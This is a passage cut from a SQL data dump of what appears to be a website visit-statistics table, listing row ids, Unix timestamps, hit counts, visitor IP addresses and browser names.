92.112.125.243','chrome'),(212178,1519383031,2,2,0,0,'78.111.185.96','chrome'),(212179,1519383115,1,1,0,0,'91.196.178.166','chrome'),(212180,1519383237,17,17,0,0,'178.203.120.211','other'),(212181,1519383708,1,1,0,0,'141.8.142.74','other'),(212182,1519383779,1,1,0,0,'91.196.178.74','firefox'),(212183,1519383865,1,1,0,0,'66.249.73.71','chrome'),(212184,1519383868,1,1,0,0,'66.249.73.91','chrome'),(212185,1519384000,1,1,0,0,'91.196.178.104','chrome'),(212186,1519384325,1,1,0,0,'66.249.73.67','chrome'),(212187,1519384470,1,1,0,0,'199.58.86.209','other'),(212188,1519384553,2,2,0,0,'91.196.178.163','chrome'),(212189,1519384744,1,1,0,0,'92.113.152.77','chrome'),(212190,1519385330,1,1,0,0,'141.8.142.74','other'),(212191,1519386433,1,1,0,0,'54.236.8.60','other'),(212192,1519386700,1,1,0,0,'176.113.209.199','chrome'),(212193,1519387072,1,1,0,0,'77.111.244.69','chrome'),(212194,1519387365,2,2,0,0,'130.180.216.63','chrome'),(212195,1519387559,1,1,0,0,'54.236.8.60','other'),(212196,1519387718,1,1,0,0,'141.8.142.74','other'),(212197,1519388062,1,1,0,0,'91.196.178.134','chrome'),(212198,1519388602,1,1,0,0,'54.236.8.60','other'),(212199,1519388817,3,3,0,0,'91.196.177.46','chrome'),(212200,1519389443,1,0,1,0,'66.249.73.91',''),(212201,1519389610,1,1,0,0,'54.236.8.60','other'),(212202,1519389628,1,1,0,0,'66.249.73.67','chrome'),(212203,1519389756,1,0,1,0,'66.249.73.71',''),(212204,1519390092,1,1,0,0,'54.36.148.43','other'),(212205,1519390504,1,1,0,0,'54.36.148.240','other'),(212206,1519390842,1,1,0,0,'54.36.148.14','other'),(212207,1519391001,1,1,0,0,'54.36.148.230','other'),(212208,1519391708,1,1,0,0,'54.36.149.35','other'),(212209,1519391744,1,1,0,0,'54.36.149.30','other'),(212210,1519392027,1,1,0,0,'54.36.148.169','other'),(212211,1519392332,1,1,0,0,'94.180.198.217','msie'),(212212,1519392334,1,1,0,0,'8.29.198.26','other'),(212213,1519392675,2,2,0,0,'54.36.149.82','other'),(212214,1519393002,1,1,0,0,'54.236.8.60','other'),(212215,1519393164,1,1,0,0,'87.250.224.46','other'),(212216,1519393473,1,1,0,0,'40.77.167.149','other'),(212217,1519393670,2,2,0,0,'141.8.142.74','other'),(212218,1519393977,1,1,0,0,'54.36.148.236','other'),(212219,1519394109,1,1,0,0,'54.236.8.60','other'),(212220,1519394181,1,1,0,0,'54.36.148.57','other'),(212221,1519394396,1,1,0,0,'54.36.149.92','other'),(212222,1519394761,1,1,0,0,'91.196.177.8','chrome'),(212223,1519395177,1,1,0,0,'54.236.8.60','other'),(212224,1519395403,1,1,0,0,'54.36.149.71','other'),(212225,1519396060,1,1,0,0,'54.36.148.243','other'),(212226,1519396231,2,2,0,0,'178.154.171.88','other'),(212227,1519396425,12,12,0,0,'69.30.221.250','other'),(212228,1519396439,1,1,0,0,'91.196.177.8','chrome'),(212229,1519396893,1,1,0,0,'54.36.148.203','other'),(212230,1519397075,1,1,0,0,'40.77.167.111','other'),(212231,1519397215,1,1,0,0,'193.34.94.3','chrome'),(212232,1519397436,2,2,0,0,'141.8.142.74','other'),(212233,1519397804,1,1,0,0,'217.76.207.11','firefox'),(212234,1519397863,1,1,0,0,'54.36.148.53','other'),(212235,1519397992,1,1,0,0,'54.236.8.60','other'),(212236,1519398047,1,1,0,0,'54.36.148.83','other'),(212237,1519398372,1,1,0,0,'54.36.148.45','other'),(212238,1519398469,1,1,0,0,'54.36.149.102','other'),(212239,1519398597,1,1,0,0,'54.36.148.58','other'),(212240,1519399106,1,1,0,0,'54.236.8.60','other'),(212241,1519399301,2,2,0,0,'141.8.142.74','other'),(212242,1519400148,1,0,1,0,'66.249.73.23',''),(212243,1519400166,1,1,0,0,'66.249.73.23','chrome'),(212244,1519400174,1,0,1,0,'66.249.73.91',''),(212245,1519400186,1,1,0,0,'54.165.59.7','other'),(212246,1519400272,1,1,0,0,'91.196.178.131','chrome'),(212247,1519400287,1,1,0,0,'54.236.8.60','other'),(212248,1519400584,1,1,0,0,'217.69.133.233','other'),(212249,1519400658,1,1,0,0,'178.154.171.88','other'),(212250,1519401087,1,1,0,0,'54.36.148.192','other'),(212251,1519401219,1,1,0,0,'54.36.149.37','other'),(212252,1519401679,1,1,0,0,'141.8.142.74','other'),(212253,1519402157,1,1,0,0,'54.36.148.87','other'),(212254,1519402693,1,1,0,0,'141.8.142.74','other'),(212255,1519402985,2,2,0,0,'91.196.178.165','chrome'),(212256,1519403169,1,1,0,0,'91.196.178.130','chrome'),(212257,1519403171,1,1,0,0,'8.29.198.25','other'),(212258,1519403434,1,1,0,0,'66.249.73.25','chrome'),(212259,1519403647,1,1,0,0,'54.236.8.60','other'),(212260,1519403923,1,1,0,0,'188.230.43.254','other'),(212261,1519404721,1,1,0,0,'54.236.8.60','other'),(212262,1519405849,1,1,0,0,'54.236.8.60','other'),(212263,1519405892,1,0,1,0,'66.249.73.93',''),(212264,1519406324,1,1,0,0,'188.230.43.254','other'),(212265,1519406533,1,1,0,0,'54.36.149.7','other'),(212266,1519406801,2,2,0,0,'141.8.142.74','other'),(212267,1519406827,1,1,0,0,'54.36.148.45','other'),(212268,1519407084,1,1,0,0,'54.36.149.23','other'),(212269,1519407409,1,1,0,0,'54.36.148.238','other'),(212270,1519407450,1,1,0,0,'185.132.0.125','firefox'),(212271,1519407917,2,2,0,0,'195.10.210.49','chrome'),(212272,1519407996,1,1,0,0,'54.36.148.100','other'),(212273,1519408097,1,1,0,0,'54.36.149.100','other'),(212274,1519408236,1,1,0,0,'217.69.143.45','other'),(212275,1519408443,1,1,0,0,'54.36.148.43','other'),(212276,1519408728,1,1,0,0,'188.230.43.254','other'),(212277,1519408902,1,1,0,0,'40.77.167.123','other'),(212278,1519409653,1,1,0,0,'54.36.148.114','other'),(212279,1519410140,1,1,0,0,'54.236.8.60','other'),(212280,1519410426,1,1,0,0,'91.196.178.74','firefox'),(212281,1519410535,1,1,0,0,'54.36.148.106','other'),(212282,1519410563,1,1,0,0,'54.36.149.101','other'),(212283,1519411047,1,1,0,0,'54.236.8.60','other'),(212284,1519411121,1,1,0,0,'188.230.43.254','other'),(212285,1519411308,1,1,0,0,'91.196.177.129','chrome'),(212286,1519411956,1,1,0,0,'54.236.8.60','other'),(212287,1519412543,1,1,0,0,'54.36.148.247','other'),(212288,1519412616,1,1,0,0,'157.55.39.141','other'),(212289,1519412831,1,1,0,0,'192.187.101.178','firefox'),(212290,1519413022,1,1,0,0,'91.195.96.46','firefox'),(212291,1519413150,1,1,0,0,'54.36.148.127','other'),(212292,1519413157,1,1,0,0,'54.36.148.29','other'),(212293,1519413248,1,1,0,0,'54.36.148.17','other'),(212294,1519413570,1,1,0,0,'146.120.174.11','firefox'),(212295,1519413885,1,1,0,0,'178.154.171.88','other'),(212296,1519414017,1,1,0,0,'8.29.198.25','other'),(212297,1519414131,1,1,0,0,'54.36.148.155','other'),(212298,1519414371,1,1,0,0,'54.36.149.88','other'),(212299,1519414647,1,1,0,0,'54.36.148.57','other'),(212300,1519414974,2,2,0,0,'54.165.59.7','other'),(212301,1519415160,1,1,0,0,'54.36.149.38','other'),(212302,1519416045,1,1,0,0,'90.175.179.151','chrome'),(212303,1519416292,1,1,0,0,'141.8.142.74','other'),(212304,1519416957,1,1,0,0,'54.236.8.60','other'),(212305,1519417091,1,1,0,0,'54.36.148.164','other'),(212306,1519417341,1,1,0,0,'141.8.142.74','other'),(212307,1519417354,1,1,0,0,'54.36.148.60','other'),(212308,1519417552,2,2,0,0,'91.196.178.77','chrome'),(212309,1519417776,1,1,0,0,'54.36.148.202','other'),(212310,1519417869,1,1,0,0,'54.236.8.60','other'),(212311,1519418544,1,1,0,0,'54.36.148.240','other'),(212312,1519418840,1,1,0,0,'54.236.8.60','other'),(212313,1519418995,1,1,0,0,'54.36.148.78','other'),(212314,1519419164,1,1,0,0,'54.36.148.41','other'),(212315,1519419453,1,1,0,0,'54.36.148.172','other'),(212316,1519419554,1,1,0,0,'54.36.149.22','other'),(212317,1519419753,1,1,0,0,'54.36.148.186','other'),(212318,1519420234,1,1,0,0,'54.36.148.90','other'),(212319,1519420408,2,2,0,0,'141.8.142.74','other'),(212320,1519420643,2,2,0,0,'178.154.171.88','other'),(212321,1519420690,1,1,0,0,'217.69.133.232','other'),(212322,1519420731,1,1,0,0,'54.36.148.166','other'),(212323,1519420855,1,1,0,0,'54.36.149.55','other'),(212324,1519421218,1,1,0,0,'173.234.159.250','other'),(212325,1519421842,1,1,0,0,'54.36.149.103','other'),(212326,1519422627,1,1,0,0,'141.8.142.74','other'),(212327,1519422851,1,1,0,0,'54.36.148.253','other'),(212328,1519423510,1,1,0,0,'54.36.148.22','other'),(212329,1519423692,1,1,0,0,'141.8.142.74','other'),(212330,1519424084,1,1,0,0,'54.36.148.125','other'),(212331,1519424255,1,1,0,0,'54.36.148.119','other'),(212332,1519424553,1,1,0,0,'54.236.8.60','other'),(212333,1519424645,1,1,0,0,'178.154.171.88','other'),(212334,1519424778,1,1,0,0,'54.36.148.204','other'),(212335,1519424863,1,1,0,0,'8.29.198.26','other'),(212336,1519424917,1,1,0,0,'54.36.148.86','other'),(212337,1519425105,1,1,0,0,'46.161.9.39','firefox'),(212338,1519425182,1,1,0,0,'141.8.142.74','other'),(212339,1519425209,1,1,0,0,'54.36.148.226','other'),(212340,1519425583,1,1,0,0,'54.236.8.60','other'),(212341,1519425616,1,1,0,0,'54.36.149.20','other'),(212342,1519425807,1,1,0,0,'54.36.148.113','other'),(212343,1519425811,1,1,0,0,'54.36.148.73','other'),(212344,1519426222,1,1,0,0,'54.36.148.107','other'),(212345,1519426234,1,1,0,0,'54.36.148.108','other'),(212346,1519426437,1,1,0,0,'66.249.73.24','chrome'),(212347,1519426484,1,1,0,0,'54.36.148.206','other'),(212348,1519426555,1,1,0,0,'54.236.8.60','other'),(212349,1519426866,1,1,0,0,'178.154.171.88','other'),(212350,1519427041,1,1,0,0,'54.36.148.62','other'),(212351,1519427245,1,1,0,0,'54.36.148.54','other'),(212352,1519428730,1,1,0,0,'54.36.148.76','other'),(212353,1519428836,1,1,0,0,'54.36.149.60','other'),(212354,1519428907,2,2,0,0,'178.154.171.88','other'),(212355,1519429115,1,1,0,0,'54.36.148.75','other'),(212356,1519429979,1,1,0,0,'54.36.148.119','other'),(212357,1519430176,1,1,0,0,'54.36.148.109','other'),(212358,1519430183,1,1,0,0,'54.36.148.242','other'),(212359,1519430268,1,1,0,0,'54.36.148.222','other'),(212360,1519430295,1,1,0,0,'54.36.148.165','other'),(212361,1519430602,1,1,0,0,'54.36.148.78','other'),(212362,1519430614,1,1,0,0,'66.249.73.23','chrome'),(212363,1519430623,1,1,0,0,'54.36.148.50','other'),(212364,1519430632,1,1,0,0,'54.36.148.168','other'),(212365,1519430665,1,1,0,0,'66.249.73.25','chrome'),(212366,1519430667,1,1,0,0,'66.249.73.91','chrome'),(212367,1519430889,1,0,1,0,'66.249.73.24',''),(212368,1519430893,1,1,0,0,'54.36.148.145','other'),(212369,1519431293,1,1,0,0,'141.8.142.74','other'),(212370,1519431375,1,1,0,0,'54.36.149.29','other'),(212371,1519431486,1,1,0,0,'54.36.148.253','other'),(212372,1519431567,1,1,0,0,'54.36.148.120','other'),(212373,1519431634,1,1,0,0,'54.236.8.60','other'),(212374,1519431679,1,1,0,0,'54.37.87.8','other'),(212375,1519431692,1,1,0,0,'54.36.148.87','other'),(212376,1519431740,1,1,0,0,'54.36.148.109','other'),(212377,1519432169,1,1,0,0,'54.36.148.172','other'),(212378,1519432608,1,1,0,0,'54.36.148.173','other'),(212379,1519432619,1,1,0,0,'54.236.8.60','other'),(212380,1519433045,1,1,0,0,'54.36.148.243','other'),(212381,1519433310,1,1,0,0,'54.36.148.59','other'),(212382,1519433336,2,2,0,0,'141.8.142.74','other'),(212383,1519433404,1,1,0,0,'54.36.149.69','other'),(212384,1519433442,1,1,0,0,'54.36.148.222','other'),(212385,1519433601,1,1,0,0,'54.236.8.60','other'),(212386,1519434063,2,2,0,0,'40.77.167.123','other'),(212387,1519434500,1,1,0,0,'54.36.148.104','other'),(212388,1519434984,1,1,0,0,'54.36.148.14','other'),(212389,1519435160,1,1,0,0,'180.76.15.150','other'),(212390,1519435350,1,1,0,0,'40.77.167.123','other'),(212391,1519435707,1,1,0,0,'8.29.198.25','other'),(212392,1519435921,1,1,0,0,'54.36.148.59','other'),(212393,1519436104,1,1,0,0,'54.36.148.14','other'),(212394,1519436539,1,1,0,0,'54.36.149.44','other'),(212395,1519436835,1,1,0,0,'54.36.148.68','other'),(212396,1519437963,1,1,0,0,'54.36.148.240','other'),(212397,1519438554,1,1,0,0,'54.36.148.185','other'),(212398,1519438772,2,2,0,0,'178.154.171.88','other'),(212399,1519438995,1,1,0,0,'217.69.134.178','other'),(212400,1519439161,1,1,0,0,'54.36.149.55','other'),(212401,1519439701,1,1,0,0,'54.36.149.28','other'),(212402,1519439719,1,1,0,0,'54.236.8.60','other'),(212403,1519439742,1,1,0,0,'54.36.148.168','other'),(212404,1519439876,1,1,0,0,'54.36.148.217','other'),(212405,1519440367,1,1,0,0,'54.36.148.95','other'),(212406,1519440578,1,1,0,0,'141.8.142.74','other'),(212407,1519440723,1,1,0,0,'54.36.148.49','other'),(212408,1519440889,1,1,0,0,'54.236.8.60','other'),(212409,1519441434,1,1,0,0,'37.9.113.182','other'),(212410,1519441541,1,1,0,0,'54.36.148.253','other'),(212411,1519441900,1,1,0,0,'141.8.142.74','other'),(212412,1519442063,1,1,0,0,'54.236.8.60','other'),(212413,1519442325,1,1,0,0,'54.36.148.195','other'),(212414,1519442714,1,1,0,0,'54.165.59.7','other'),(212415,1519442904,1,1,0,0,'54.36.148.36','other'),(212416,1519443290,1,1,0,0,'141.8.142.74','other'),(212417,1519443397,1,1,0,0,'40.77.167.149','other'),(212418,1519443427,1,1,0,0,'54.36.148.131','other'),(212419,1519444689,1,1,0,0,'40.77.167.111','other'),(212420,1519444751,1,1,0,0,'54.36.148.66','other'),(212421,1519444973,1,1,0,0,'54.36.148.87','other'),(212422,1519445401,1,1,0,0,'54.36.148.36','other'),(212423,1519445890,1,1,0,0,'54.36.148.143','other'),(212424,1519446547,1,1,0,0,'8.29.198.26','other'),(212425,1519446775,1,1,0,0,'54.36.148.128','other'),(212426,1519446881,1,1,0,0,'54.36.149.38','other'),(212427,1519446984,1,1,0,0,'54.36.148.162','other'),(212428,1519447085,1,1,0,0,'141.8.142.74','other'),(212429,1519448461,1,1,0,0,'54.236.8.60','other'),(212430,1519448589,1,1,0,0,'54.36.148.193','other'),(212431,1519448751,1,1,0,0,'54.36.148.57','other'),(212432,1519448760,1,1,0,0,'178.154.171.88','other'),(212433,1519449271,1,1,0,0,'217.147.169.236','chrome'),(212434,1519449472,1,1,0,0,'54.236.8.60','other'),(212435,1519449595,1,1,0,0,'54.36.148.224','other'),(212436,1519450033,1,1,0,0,'54.36.148.234','other'),(212437,1519450377,1,1,0,0,'54.36.149.60','other'),(212438,1519450540,1,1,0,0,'54.36.148.206','other'),(212439,1519450545,1,1,0,0,'54.36.148.217','other'),(212440,1519450659,1,1,0,0,'54.236.8.60','other'),(212441,1519450752,1,1,0,0,'95.133.151.231','chrome'),(212442,1519450887,1,1,0,0,'54.36.148.71','other'),(212443,1519452026,1,1,0,0,'54.36.148.145','other'),(212444,1519452612,1,1,0,0,'54.36.149.52','other'),(212445,1519452802,1,1,0,0,'141.8.142.74','other'),(212446,1519453198,1,1,0,0,'54.36.149.7','other'),(212447,1519453218,1,1,0,0,'54.36.148.250','other'),(212448,1519453472,1,1,0,0,'54.36.148.143','other'),(212449,1519453894,1,1,0,0,'54.36.148.243','other'),(212450,1519453934,1,1,0,0,'54.36.148.103','other'),(212451,1519453994,1,1,0,0,'37.9.113.115','other'),(212452,1519454155,1,1,0,0,'54.36.148.136','other'),(212453,1519454319,1,1,0,0,'54.36.149.91','other'),(212454,1519455189,1,1,0,0,'54.36.149.73','other'),(212455,1519455196,1,1,0,0,'54.36.149.30','other'),(212456,1519455315,1,1,0,0,'54.36.149.69','other'),(212457,1519455448,1,1,0,0,'54.36.149.49','other'),(212458,1519455753,1,1,0,0,'54.36.148.173','other'),(212459,1519456150,1,1,0,0,'54.36.148.118','other'),(212460,1519456261,1,1,0,0,'54.36.148.147','other'),(212461,1519456492,1,1,0,0,'54.36.148.121','other'),(212462,1519456516,1,1,0,0,'54.36.148.163','other'),(212463,1519456718,1,1,0,0,'54.36.148.108','other'),(212464,1519456892,1,1,0,0,'54.36.149.82','other'),(212465,1519457309,1,1,0,0,'54.36.148.167','other'),(212466,1519457374,1,1,0,0,'157.55.39.126','other'),(212467,1519457390,1,1,0,0,'8.29.198.27','other'),(212468,1519457399,1,1,0,0,'54.36.148.23','other'),(212469,1519457782,1,1,0,0,'54.36.148.233','other'),(212470,1519457929,1,1,0,0,'54.236.8.60','other'),(212471,1519458222,1,1,0,0,'54.36.148.106','other'),(212472,1519458314,3,3,0,0,'62.210.101.96','other'),(212473,1519458380,1,1,0,0,'54.36.148.188','other'),(212474,1519458471,1,1,0,0,'207.46.13.184','other'),(212475,1519458511,1,1,0,0,'207.46.13.106','other'),(212476,1519459243,1,1,0,0,'54.236.8.60','other'),(212477,1519459468,1,1,0,0,'54.36.148.201','other'),(212478,1519459796,1,1,0,0,'207.46.13.106','other'),(212479,1519460443,1,1,0,0,'54.236.8.60','other'),(212480,1519460459,1,1,0,0,'54.36.148.41','other'),(212481,1519461002,1,1,0,0,'188.230.43.254','other'),(212482,1519461825,1,1,0,0,'141.8.142.74','other'),(212483,1519463116,1,1,0,0,'40.77.167.123','other'),(212484,1519463735,1,1,0,0,'91.196.178.133','chrome'),(212485,1519463835,1,1,0,0,'162.210.196.98','other'),(212486,1519463965,2,2,0,0,'144.76.8.66','other'),(212487,1519464275,2,2,0,0,'92.113.188.43','chrome'),(212488,1519464781,1,1,0,0,'54.36.148.90','other'),(212489,1519464819,1,1,0,0,'54.36.148.11','other'),(212490,1519465297,1,1,0,0,'54.36.148.126','other'),(212491,1519465328,1,1,0,0,'54.36.149.24','other'),(212492,1519465450,1,1,0,0,'37.110.158.14','msie'),(212493,1519465716,2,2,0,0,'54.36.149.33','other'),(212494,1519466005,1,1,0,0,'54.36.149.51','other'),(212495,1519466216,1,1,0,0,'54.36.148.197','other'),(212496,1519466327,1,1,0,0,'54.36.148.86','other'),(212497,1519466982,1,1,0,0,'54.36.148.75','other'),(212498,1519467491,1,1,0,0,'54.236.8.60','other'),(212499,1519468234,1,1,0,0,'8.29.198.27','other'),(212500,1519468401,1,1,0,0,'54.236.8.60','other'),(212501,1519469041,1,1,0,0,'91.209.11.236','other'),(212502,1519469251,1,1,0,0,'157.55.39.236','other'),(212503,1519469269,1,1,0,0,'141.8.142.74','other'),(212504,1519469368,1,1,0,0,'54.236.8.60','other'),(212505,1519470620,1,1,0,0,'66.249.73.25','chrome'),(212506,1519470745,1,1,0,0,'54.236.8.60','other'),(212507,1519471280,1,1,0,0,'40.77.167.123','other'),(212508,1519471478,2,2,0,0,'195.10.210.49','chrome'),(212509,1519471598,1,1,0,0,'141.8.142.74','other'),(212510,1519471995,1,1,0,0,'107.167.105.179','other'),(212511,1519472273,1,1,0,0,'91.209.11.236','other'),(212512,1519472490,1,1,0,0,'66.249.73.23','chrome'),(212513,1519473835,1,1,0,0,'212.129.28.157','chrome'),(212514,1519474168,1,1,0,0,'141.8.142.74','other'),(212515,1519474415,1,1,0,0,'157.55.39.126','other'),(212516,1519474997,1,1,0,0,'180.76.15.148','other'),(212517,1519475255,1,1,0,0,'66.249.73.93','chrome'),(212518,1519475371,1,1,0,0,'134.249.174.167','chrome'),(212519,1519476426,1,1,0,0,'141.8.142.74','other'),(212520,1519476499,1,1,0,0,'217.69.134.200','other'),(212521,1519477121,1,1,0,0,'178.154.171.88','other'),(212522,1519477497,1,0,1,0,'66.249.73.89',''),(212523,1519477523,1,0,1,0,'66.249.73.91',''),(212524,1519478192,1,1,0,0,'157.55.39.126','other'),(212525,1519478262,1,1,0,0,'81.162.237.121','chrome'),(212526,1519478302,1,1,0,0,'88.198.54.49','other'),(212527,1519479048,1,1,0,0,'54.36.148.47','other'),(212528,1519479075,1,1,0,0,'8.29.198.27','other'),(212529,1519479377,1,1,0,0,'54.36.149.3','other'),(212530,1519479618,1,1,0,0,'54.36.148.59','other'),(212531,1519479818,1,1,0,0,'54.36.148.155','other'),(212532,1519479917,1,1,0,0,'54.36.148.15','other'),(212533,1519479968,1,1,0,0,'54.36.148.187','other'),(212534,1519480035,1,1,0,0,'54.236.8.60','other'),(212535,1519481150,1,1,0,0,'54.236.8.60','other'),(212536,1519481178,1,1,0,0,'54.36.148.53','other'),(212537,1519481793,1,1,0,0,'54.36.148.230','other'),(212538,1519482121,1,1,0,0,'54.36.149.70','other'),(212539,1519482134,1,1,0,0,'193.194.127.222','firefox'),(212540,1519482292,1,1,0,0,'54.236.8.60','other'),(212541,1519482691,1,1,0,0,'54.36.148.92','other'),(212542,1519483035,1,1,0,0,'54.36.148.60','other'),(212543,1519483482,1,1,0,0,'54.236.8.60','other'),(212544,1519483549,1,1,0,0,'54.36.148.123','other'),(212545,1519483921,1,1,0,0,'54.36.149.79','other'),(212546,1519484383,1,1,0,0,'54.36.149.60','other'),(212547,1519484488,1,1,0,0,'54.36.148.207','other'),(212548,1519484522,5,5,0,0,'141.8.142.74','other'),(212549,1519484794,1,1,0,0,'54.236.8.60','other'),(212550,1519485023,1,1,0,0,'54.36.149.81','other'),(212551,1519485516,1,1,0,0,'54.36.148.56','other'),(212552,1519485612,1,1,0,0,'54.36.148.166','other'),(212553,1519485720,1,1,0,0,'54.36.148.249','other'),(212554,1519486200,2,2,0,0,'91.196.178.2','chrome'),(212555,1519486731,1,1,0,0,'188.230.43.254','other'),(212556,1519486741,2,2,0,0,'178.154.171.88','other'),(212557,1519486953,1,1,0,0,'141.8.142.74','other'),(212558,1519487218,1,1,0,0,'54.36.148.250','other'),(212559,1519487340,1,1,0,0,'54.36.149.67','other'),(212560,1519487520,1,1,0,0,'54.36.148.181','other'),(212561,1519487576,1,1,0,0,'94.180.3.63','firefox'),(212562,1519487578,1,1,0,0,'94.180.3.63','chrome'),(212563,1519487840,1,1,0,0,'54.36.148.165','other'),(212564,1519488111,1,1,0,0,'54.36.149.93','other'),(212565,1519488198,1,1,0,0,'54.36.148.16','other'),(212566,1519488302,1,1,0,0,'141.8.142.74','other'),(212567,1519489182,1,1,0,0,'54.36.148.86','other'),(212568,1519489290,1,1,0,0,'13.56.229.65','chrome'),(212569,1519489303,1,1,0,0,'54.36.148.196','other'),(212570,1519489632,1,1,0,0,'54.36.148.66','other'),(212571,1519489860,1,1,0,0,'54.36.148.240','other'),(212572,1519489919,1,1,0,0,'8.29.198.27','other'),(212573,1519490356,1,1,0,0,'94.179.208.94','chrome'),(212574,1519490399,1,1,0,0,'54.36.148.255','other'),(212575,1519490539,2,2,0,0,'91.196.178.100','chrome'),(212576,1519490654,1,1,0,0,'91.196.178.133','chrome'),(212577,1519490977,1,1,0,0,'54.36.149.12','other'),(212578,1519491105,1,1,0,0,'54.36.149.63','other'),(212579,1519491553,1,1,0,0,'54.36.148.76','other'),(212580,1519491805,2,2,0,0,'95.132.17.130','chrome'),(212581,1519492123,1,1,0,0,'54.36.149.106','other'),(212582,1519493339,1,1,0,0,'185.22.173.86','firefox'),(212583,1519493370,1,1,0,0,'91.196.178.133','chrome'),(212584,1519493621,1,1,0,0,'54.36.148.162','other'),(212585,1519493648,1,1,0,0,'54.36.148.234','other'),(212586,1519493947,1,1,0,0,'54.36.148.73','other'),(212587,1519494506,1,1,0,0,'141.8.142.74','other'),(212588,1519494710,1,1,0,0,'91.196.178.104','chrome'),(212589,1519494947,1,1,0,0,'54.36.148.212','other'),(212590,1519495302,1,1,0,0,'54.36.148.199','other'),(212591,1519495319,1,1,0,0,'54.236.8.60','other'),(212592,1519495325,1,1,0,0,'54.36.148.214','other'),(212593,1519495345,2,2,0,0,'54.36.148.231','other'),(212594,1519495702,1,1,0,0,'54.36.149.82','other'),(212595,1519496398,1,1,0,0,'54.36.148.39','other'),(212596,1519496631,1,1,0,0,'54.236.8.60','other'),(212597,1519497359,1,1,0,0,'54.36.148.158','other'),(212598,1519497614,1,1,0,0,'37.52.23.79','firefox'),(212599,1519497876,1,1,0,0,'54.36.148.54','other'),(212600,1519498012,1,1,0,0,'54.36.148.148','other'),(212601,1519498015,1,1,0,0,'54.36.148.231','other'),(212602,1519498100,1,1,0,0,'54.236.8.60','other'),(212603,1519498120,1,1,0,0,'141.8.142.74','other'),(212604,1519498161,1,1,0,0,'54.36.148.249','other'),(212605,1519498490,1,1,0,0,'217.69.133.6','other'),(212606,1519498555,1,1,0,0,'54.36.149.55','other'),(212607,1519498716,1,1,0,0,'178.219.84.26','firefox'),(212608,1519499219,1,1,0,0,'54.36.149.63','other'),(212609,1519499357,1,1,0,0,'54.36.149.59','other'),(212610,1519499401,1,1,0,0,'54.36.148.117','other'),(212611,1519499423,1,1,0,0,'54.36.148.133','other'),(212612,1519499512,1,1,0,0,'54.236.8.60','other'),(212613,1519499708,1,1,0,0,'54.36.148.254','other'),(212614,1519500142,1,1,0,0,'54.36.148.103','other'),(212615,1519500291,1,1,0,0,'54.36.149.63','other'),(212616,1519500754,1,1,0,0,'54.36.148.166','other'),(212617,1519500761,1,1,0,0,'8.29.198.26','other'),(212618,1519500822,1,1,0,0,'54.236.8.60','other'),(212619,1519501361,1,1,0,0,'54.36.148.144','other'),(212620,1519501469,1,1,0,0,'54.36.148.107','other'),(212621,1519501645,1,1,0,0,'54.36.148.168','other'),(212622,1519501684,2,2,0,0,'92.113.188.43','chrome'),(212623,1519501689,1,1,0,0,'54.36.148.227','other'),(212624,1519503215,1,1,0,0,'54.36.148.175','other'),(212625,1519503232,1,1,0,0,'54.36.149.51','other'),(212626,1519503429,1,1,0,0,'141.8.142.74','other'),(212627,1519503593,2,2,0,0,'157.55.39.236','other'),(212628,1519503899,1,1,0,0,'54.36.148.237','other'),(212629,1519504371,1,1,0,0,'54.36.148.252','other'),(212630,1519504592,1,1,0,0,'54.36.149.62','other'),(212631,1519504723,1,1,0,0,'54.36.148.58','other'),(212632,1519505531,1,1,0,0,'54.36.148.213','other'),(212633,1519505649,1,1,0,0,'54.36.148.108','other'),(212634,1519506392,6,6,0,0,'141.8.142.74','other'),(212635,1519506409,2,2,0,0,'178.154.171.88','other'),(212636,1519506418,1,1,0,0,'37.9.113.182','other'),(212637,1519506564,1,0,1,0,'66.249.73.91',''),(212638,1519507315,1,1,0,0,'54.36.148.241','other'),(212639,1519508240,1,1,0,0,'54.36.149.75','other'),(212640,1519508479,1,1,0,0,'54.36.148.165','other'),(212641,1519508785,1,1,0,0,'54.36.148.101','other'),(212642,1519509231,1,1,0,0,'54.36.148.152','other'),(212643,1519509667,1,1,0,0,'54.36.148.31','other'),(212644,1519509848,1,1,0,0,'54.36.148.106','other'),(212645,1519509854,1,1,0,0,'54.36.148.81','other'),(212646,1519510098,1,1,0,0,'54.36.148.151','other'),(212647,1519510173,1,1,0,0,'54.36.148.184','other'),(212648,1519510209,1,1,0,0,'54.36.148.60','other'),(212649,1519510215,1,1,0,0,'54.36.148.102','other'),(212650,1519510546,1,1,0,0,'95.132.135.103','chrome'),(212651,1519510884,1,1,0,0,'54.36.148.125','other'),(212652,1519511363,1,1,0,0,'54.36.148.145','other'),(212653,1519511450,1,1,0,0,'54.36.149.103','other'),(212654,1519511603,1,1,0,0,'8.29.198.25','other'),(212655,1519511671,1,1,0,0,'54.36.149.67','other'),(212656,1519511718,1,1,0,0,'54.36.148.135','other'),(212657,1519511846,1,1,0,0,'178.154.171.88','other'),(212658,1519512342,1,1,0,0,'54.36.149.3','other'),(212659,1519512882,1,1,0,0,'54.236.8.60','other'),(212660,1519513232,1,1,0,0,'54.36.148.104','other'),(212661,1519513248,1,1,0,0,'54.36.148.45','other'),(212662,1519513413,2,2,0,0,'141.8.142.74','other'),(212663,1519513641,1,1,0,0,'54.36.148.54','other'),(212664,1519513819,1,1,0,0,'54.36.148.251','other'),(212665,1519513823,1,1,0,0,'54.36.148.96','other'),(212666,1519514054,1,1,0,0,'157.55.39.170','other'),(212667,1519514226,1,1,0,0,'54.36.148.98','other'),(212668,1519514347,1,1,0,0,'54.236.8.60','other'),(212669,1519514597,1,1,0,0,'54.36.148.55','other'),(212670,1519514814,1,1,0,0,'54.36.149.96','other'),(212671,1519514883,1,1,0,0,'40.77.167.123','other'),(212672,1519515086,1,1,0,0,'54.36.148.68','other'),(212673,1519515657,1,1,0,0,'54.36.149.44','other'),(212674,1519515936,1,1,0,0,'54.36.148.122','other'),(212675,1519515947,1,1,0,0,'54.236.8.60','other'),(212676,1519516087,1,1,0,0,'54.36.149.70','other'),(212677,1519516220,1,1,0,0,'54.36.148.141','other'),(212678,1519517286,1,1,0,0,'40.77.167.123','other'),(212679,1519517588,1,1,0,0,'54.236.8.60','other'),(212680,1519517937,1,1,0,0,'54.36.148.231','other'),(212681,1519518455,1,1,0,0,'54.36.148.186','other'),(212682,1519518581,1,1,0,0,'54.36.148.62','other'),(212683,1519518876,1,1,0,0,'40.77.167.123','other'),(212684,1519518886,1,1,0,0,'54.36.148.123','other'),(212685,1519518937,1,1,0,0,'54.36.148.199','other'),(212686,1519519122,1,1,0,0,'54.236.8.60','other'),(212687,1519519265,1,1,0,0,'54.36.149.38','other'),(212688,1519519464,1,1,0,0,'180.76.15.34','other'),(212689,1519519490,1,1,0,0,'40.77.167.85','other'),(212690,1519519652,2,1,1,0